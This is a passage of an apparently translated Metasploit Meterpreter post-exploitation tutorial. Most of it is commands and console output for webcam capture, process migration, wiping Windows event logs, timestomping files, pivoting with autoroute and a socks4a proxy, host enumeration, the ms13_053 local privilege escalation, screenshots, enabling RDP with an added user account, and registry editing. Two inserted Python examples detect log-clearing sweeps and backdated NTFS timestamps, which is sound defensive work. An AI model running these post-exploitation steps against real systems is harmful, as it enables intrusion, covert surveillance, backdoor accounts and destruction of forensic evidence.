meterpreter > webcam_list
[-] webcam_list: Operation failed: A device attached to the system is not functioning.
meterpreter > webcam_snap
[-] webcam_list: Operation failed: A device attached to the system is not functioning.
meterpreter >
If the target does have a webcam, the output looks like this instead:
meterpreter > webcam_list
1: FaceTime HD Camera (Built-in)
Take a photo
Execute a file
The parameters are as follows:
meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H        Create the process hidden from view.
-a <opt>  The arguments to pass to the command.
-c        Channelized I/O (required for interaction).
-d <opt>  The 'dummy' executable to launch when using -m.
-f <opt>  The executable command to run.
-h        Help menu.
-i        Interact with the process after creating it.
-k        Execute process on the meterpreters current desktop
-m        Execute from memory.
-s <opt>  Execute process in a given session as the session user
-t        Execute process with currently impersonated thread token
meterpreter > migrate 2192
[*] Migrating from 12116 to 2192...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
meter
A process started with the same privilege level can be migrated into:
meterpreter > migrate 12032
[*] Migrating from 180 to 12032...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 12032
Clear logs
clearev    # clears the Windows Application, System and Security logs; requires administrator privileges
Before running:
After running:
meterpreter > clearev
[*] Wiping 4993 records from Application...
[*] Wiping 2239 records from System...
[*] Wiping 11222 records from Security...
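Clearing a log cannot itself be hidden from the log: Windows writes Event ID 1102 into the Security log when it is cleared and Event ID 104 into the System log when System or Application is cleared, so a defender looks for those records. The following detector is an added example, not code from the post; the JSON export format and its field names (Channel, EventID, TimeCreated, Computer, User, ClearedChannel) are assumptions, and the event lines are constructed.

```python
"""Find the records a log wipe leaves behind and report the three-log sweep
that clearev produces. Constructed JSON event export; field names assumed."""
import json
from datetime import datetime

SAMPLE_EVENTS = """\
{"Channel":"Security","EventID":4624,"TimeCreated":"2024-05-01T10:00:00Z","Computer":"WS01","User":"alice"}
{"Channel":"Security","EventID":1102,"TimeCreated":"2024-05-01T10:05:01Z","Computer":"WS01","User":"alice"}
{"Channel":"System","EventID":104,"TimeCreated":"2024-05-01T10:05:01Z","Computer":"WS01","User":"alice","ClearedChannel":"Application"}
{"Channel":"System","EventID":104,"TimeCreated":"2024-05-01T10:05:02Z","Computer":"WS01","User":"alice","ClearedChannel":"System"}
{"Channel":"System","EventID":104,"TimeCreated":"2024-04-20T08:00:00Z","Computer":"WS02","User":"bob","ClearedChannel":"Application"}
"""

def parse_time(stamp):
    return datetime.fromisoformat(stamp.replace("Z", "+00:00"))

def find_log_clears(text):
    """One finding per log-cleared event (1102 in Security, 104 in System), oldest first."""
    findings = []
    for line in filter(None, text.splitlines()):
        ev = json.loads(line)
        if ev.get("EventID") == 1102 and ev.get("Channel") == "Security":
            cleared = "Security"
        elif ev.get("EventID") == 104 and ev.get("Channel") == "System":
            cleared = ev.get("ClearedChannel", "unknown")
        else:
            continue
        findings.append({"time": parse_time(ev["TimeCreated"]), "host": ev["Computer"],
                         "user": ev.get("User", "?"), "cleared": cleared})
    return sorted(findings, key=lambda f: f["time"])

def detect_sweeps(findings, window_seconds=60):
    """A single clear may be maintenance; clearev wipes Application, System and
    Security back to back, so all three on one host inside the window is a sweep."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], []).append(f)
    sweeps = []
    for host, items in by_host.items():
        for i, first in enumerate(items):
            inside = [x for x in items[i:]
                      if (x["time"] - first["time"]).total_seconds() <= window_seconds]
            channels = {x["cleared"] for x in inside}
            if {"Application", "System", "Security"} <= channels:
                sweeps.append({"host": host, "user": first["user"],
                               "start": first["time"].isoformat(), "channels": sorted(channels)})
                break
    return sweeps
```

Only WS01 is reported: WS02 cleared a single log, which on its own is not the clearev pattern.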
timestomp (file timestamp manipulation) options:
-a <opt>  Set the "last accessed" time of the file
-b        Set the MACE timestamps so that EnCase shows blanks
-c <opt>  Set the "creation" time of the file
-e <opt>  Set the "mft entry modified" time of the file
-f <opt>  Set the MACE of attributes equal to the supplied file
-h        Help banner
-m <opt>  Set the "last written" time of the file
-r        Set the MACE timestamps recursively on a directory
-v        Display the UTC MACE values of the file
-z <opt>  Set all four attributes (MACE) of the file
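Two forensic checks catch the stamps this command writes: timestomp takes times only to the second, so the 100 ns fraction NTFS stores comes out zero, and it only rewrites $STANDARD_INFORMATION, so a $SI creation time older than the kernel-written $FILE_NAME creation time is a red flag (a heuristic; volume moves can produce legitimate exceptions). This checker is an added example, not code from the post; the MFT-style records are constructed and their layout (timestamps in nanoseconds since the Unix epoch) is an assumption.

```python
"""Flag $STANDARD_INFORMATION timestamps that look set by hand.
Records are constructed; si = $STANDARD_INFORMATION, fn = $FILE_NAME, values in ns."""
NS = 1_000_000_000

RECORDS = [
    {"path": r"C:\Users\ll\notes.txt",   # ordinary file, fractional seconds present
     "si": {"m": 1714557600_123456700, "a": 1714557601_000000100,
            "c": 1714557500_987654300, "e": 1714557600_123456700},
     "fn": {"m": 1714557500_987654300, "a": 1714557500_987654300,
            "c": 1714557500_987654300, "e": 1714557500_987654300}},
    {"path": r"C:\Windows\Temp\svc.exe",  # backdated to 2009 with whole-second values
     "si": {"m": 1250000000_000000000, "a": 1250000000_000000000,
            "c": 1250000000_000000000, "e": 1250000000_000000000},
     "fn": {"m": 1714557700_543210000, "a": 1714557700_543210000,
            "c": 1714557700_543210000, "e": 1714557700_543210000}},
]

def whole_second_fields(ts):
    """Names of timestamps whose fractional second is exactly zero (NTFS keeps 100 ns)."""
    return [k for k, v in ts.items() if v % NS == 0]

def si_creation_before_fn(rec):
    """$FILE_NAME times are not reachable through SetFileTime, so $SI created
    earlier than $FN created means the $SI value was rewritten afterwards."""
    return rec["si"]["c"] < rec["fn"]["c"]

def assess(rec):
    reasons = []
    ws = whole_second_fields(rec["si"])
    if len(ws) == 4:
        reasons.append("all four $SI timestamps are whole seconds")
    elif ws:
        reasons.append("whole-second $SI fields: " + ",".join(ws))
    if si_creation_before_fn(rec):
        reasons.append("$SI creation time predates $FN creation time")
    score = "high" if len(reasons) >= 2 else "medium" if reasons else "none"
    return {"path": rec["path"], "score": score, "reasons": reasons}

def scan(records):
    """Return only the records with at least one indicator."""
    return [r for r in map(assess, records) if r["score"] != "none"]
```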
search options:
-d <opt>  The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt>  A file pattern glob to search for. (e.g. *secret*.doc?)
-h        Help Banner
-r <opt>  Recursivly search sub directories. (Default: true)
portfwd options:
-L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
-R        Indicates a reverse port forward.
-h        Help banner.
-i <opt>  Index of the port forward entry to interact with (see the "list" command).
-l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
-p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt>  Forward: remote host to connect to.
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Usage:   run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*]   run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1/255.255.255.0
[*]   run autoroute -s 10.10.10.1                  # Netmask defaults to 255.255.255.0
[*]   run autoroute -s 10.10.10.1/24               # CIDR notation is also okay
[*]   run autoroute -p                             # Print active routing table
[*]   run autoroute -d -s 10.10.10.1               # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
Example
run autoroute -s 192.168.159.0/24    # add a route into the target network
run autoroute -p                     # list the routes that were added
arp_scanner, portscan and similar modules can then be used to scan the routed network:
run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389
Socks4a proxy
Once routes have been added with autoroute, the socks4a module bundled with msf can provide a Socks4a proxy into that network:
msf > use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run
Then:
vi /etc/proxychains.conf    # add the line: socks4 127.0.0.1 1080
run post/windows/gather/checkvm                  # is the target a virtual machine?
run post/linux/gather/checkvm                    # is the target a virtual machine?
run post/windows/gather/forensics/enum_drives    # list partitions
run post/windows/gather/enum_applications        # installed software
run post/windows/gather/dumplinks                # recent file activity
run post/windows/gather/enum_ie                  # IE cache
run post/windows/gather/enum_chrome              # Chrome cache
run post/windows/gather/enum_patches             # installed patches
run post/windows/gather/enum_domain              # locate the domain controller
meterpreter > run post/windows/gather/enum_patches    # check patch information
msf > use exploit/windows/local/ms13_053_schlamperei
msf > set SESSION 2
msf > exploit
Remote desktop & screenshots
enumdesktops    # list the available desktops
getdesktop      # show the desktop the current meterpreter session is attached to
set_desktop     # attach meterpreter to a desktop; -h shows the help
screenshot      # take a screenshot
use espia       # alternatively load the espia module, then run screengrab
run vnc         # connect over VNC; this has problems: the exe is uploaded but fails to start
enumdesktops
meterpreter > enumdesktops
Enumerating all accessible desktops

Desktops
========

    Session  Station  Name
    -------  -------  ----
    1        WinSta0  Default

screenshot
espia module
Enable RDP & add a user
getgui
The parameters are as follows:
meterpreter > run getgui -h
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or:    getgui -e
OPTIONS:
-e        Enable RDP only.
-f <opt>  Forward RDP Connection.
-h        Help menu.
-p <opt>  The Password of the user to add.
-u <opt>  The Username of the user to add.
Example
run getgui -e                      # enable remote desktop
run getgui -u lltest2 -p 123456    # add a user
run getgui -f 6661 -e              # forward port 3389 to 6661
This method is not recommended; the user creation often fails.
enable_rdp
run post/windows/manage/enable_rdp                                   # enable remote desktop
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456     # add a user
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662           # forward port 3389 to 6662
meterpreter > reg -h
Usage: reg [command] [options]
Interact with the target machine's registry.
OPTIONS:
-d <opt>  The data to store in the registry value.                                          # data of the registry value
-h        Help menu.
-k <opt>  The registry key path (E.g. HKLM\Software\Foo).                                   # registry key path
-r <opt>  The remote machine name to connect to (with current process credentials           # remote computer name to connect to (uses the current process credentials)
-t <opt>  The registry value type (E.g. REG_SZ).                                            # registry value type
-v <opt>  The registry value name (E.g. Stuff).                                             # registry value name
-w        Set KEY_WOW64 flag, valid values [32|64].                                         # select the 32-bit or 64-bit registry view
COMMANDS:
enumkey     Enumerate the supplied registry key [-k <key>]                                  # enumerate the subkeys and values of a key
createkey   Create the supplied registry key [-k <key>]                                     # create the given key
deletekey   Delete the supplied registry key [-k <key>]                                     # delete the given key
queryclass  Queries the class of the supplied key [-k <key>]                                # query the class of a key
setval      Set a registry value [-k <key> -v <val> -d <data>]                              # set a value
deleteval   Delete the supplied registry value [-k <key> -v <val>]                          # delete the given value
queryval    Queries the data contents of a value [-k <key> -v <val>]                        # query the data stored in a value